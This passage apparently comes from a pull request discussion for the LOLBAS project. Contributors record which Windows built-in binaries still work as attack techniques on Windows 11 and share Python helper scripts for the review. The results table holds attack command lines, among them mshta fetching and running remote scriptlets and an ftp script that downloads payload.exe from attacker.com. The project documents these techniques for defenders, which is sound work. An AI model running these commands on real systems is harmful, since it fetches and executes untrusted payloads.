✔️ | ||
| Runscripthelper.exe | runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test |
Not tested | Could not be located (searched under c:\windows\) |
|
| Replace.exe | replace.exe C:\Source\File.cab C:\Destination /A |
✔️ | ||
| Replace.exe | replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A |
✔️ | ||
| Mshta.exe | mshta.exe evilfile.hta |
✔️ | ||
| Mshta.exe | mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) |
❌ | Nothing seems to happen | |
| Mshta.exe | mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); |
✔️ | ||
| Mshta.exe | mshta.exe "C:\ads\file.txt:file.hta" |
❌ | Remains blank | |
| Ftp.exe | echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt |
✔️ | ||
| Ftp.exe | cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" |
✔️ | ||
| WorkFolders.exe | WorkFolders |
✔️ | ||
| Presentationhost.exe | Presentationhost.exe C:\temp\Evil.xbap |
❌ | Opens edge, blocks download… @api0cradle what are your thoughts? | |
| Pnputil.exe | pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf |
✔️ | ⚠️️ | Signature required, gui-based. Is expected behaviour… Is this a lolbin? |
For the record, this was my approach:
-
Get a CSV with all commands that should be OS-native (i.e. everything except
OtherMSBinaries).Click to show code
import csv, yaml, glob # Find all YML files data = [list(yaml.safe_load_all(open(x)))[0] for x in glob.glob('yml/**/*.yml', recursive=True) if not 'OtherMSBinaries' in x] with open('review.csv', 'w') as f: csvw = csv.writer(f) csvw.writerow(['Name', 'Command', 'Outcome', 'Needs Changing', 'Comments']) # Iterate over entries for entry in data: # Iterate over commands for command in entry['Commands']: # Write commands to CSV in defined format csvw.writerow([entry['Name'], command['Command'], '', '', '']) -
Review every entry by executing the command in a Windows 11 VM. Note that often the command needs slight tweaking, e.g. to point to your own DLL/CLSID/HTTP Server etc.
- Track your progress in
review.csv, generated in the previous step.- If a command is found to be working, update the
Outcomecolumn toWorks. Otherwise, useDoes not workor a custom text. - When there is an opportunity to improve the entry, set
Needs changingtoYes. Otherwise leave empty or putNo. - If any comments apply, put them in the
Commentscolumn.
- If a command is found to be working, update the
- Track your progress in
-
Add
Windows 11to theOperatingSystemfields of the commands that were found to be working.Click to show code
(rather than using the
yamlpackage, which will inadvertently update the formatting/structure and possibly even order of the file, I went with the simple Regex approach to make sure the changes made to the file are minimal).import csv, re, glob # Obtain & parse review results outcome_data = list(csv.DictReader(open('review.csv', encoding='utf-8'))) outcome_data = {x['Command']:x['Outcome'] for x in outcome_data} # Find all YML files files = [x for x in glob.glob('yml/**/*.yml', recursive=True)] totalhits = 0 expected_commands = set(outcome_data.keys()) # Iterate over YML files for file in files: with open(file, 'r+') as f: # Get contents data = f.read() # Find all commands hits = re.findall(r'(Command: (.+?)\n.*?OperatingSystem: (.+?))\n', data, re.DOTALL) # Iterate over found commands for all, command, os in hits: # Check if we reviewed the command outcome = outcome_data.get(command) if outcome and outcome.strip().lower() == 'works': # Remove from list of commands we expect to see if command in expected_commands: expected_commands.remove(command) totalhits += 1 # Easiest scenario: OS ends with 'Windows 10' if os.endswith('Windows 10'): # Simply append data = data.replace(all, all + ", Windows 11") # If not, check if Windows 11 is not already mentioned elif 'Windows 11' not in os: # If so, append, but add '(!!!)' as these need manual review data = data.replace(all, all + ", Windows 11 (!!!)") else: print('Warn: Windows 11 already present') # Update the file f.seek(0) f.write(data) f.truncate() print("Processed {} (expected: {})".format(totalhits, len(outcome_data))) # Display the commands that _weren't_ updated but require updating for k in expected_commands: o = outcome_data.get(k) if o.strip().lower() == 'works': print('{}'.format(k)) -
Finally, use a simple Excel formula to generate a markdown table for the Pull Request.
Click to show formula
You should have something like this:
. A B C D E 1 Name Command Outcome Needs Changing Comments 2 somename.exe some.exe command Works As expected 3 ... ... ... ... ... Put the below in F2 and drag down to the end.
="|"&A2&"|`"&SUBSTITUTE(B2,"|", "\|")&"`|"&IF(C2="Works","✔️", IF(C2="Does not work", "❌", C2))&"|"&IF(D2="Yes","⚠️️", "")&"|"&E2&"|"
@wietze this is excellent work! Attached are some comments for the Sprint. I reviewed many as I could with a bias toward some of the ones I am more familiar with. I hope this helps!
Couple of changes in b92ee99627d84fd17697e513960a3c423ff2dd34 :
- Updated Msbuild w/ RSP entry to reflect masquerading aspect;
- Removed dead payload links from Mshta entries (linking to @bohops gist in code sample section instead)
- Removed redundant wmic proc/call/create entries
- Changed iadvpack/advpack entries back to 'Privileges: User'
- Removed quotes from comsvcs/minidump command line (caused issues when executing with cmd.exe)
- Improved winrm.vbs entry description
- Added Windows 11 to entries identified as working by @bohops
@wietze, if you would like help resolve these I would like to help if i can.
Updated this branch to be up to date with the master branch, ready for re-review/merging :)
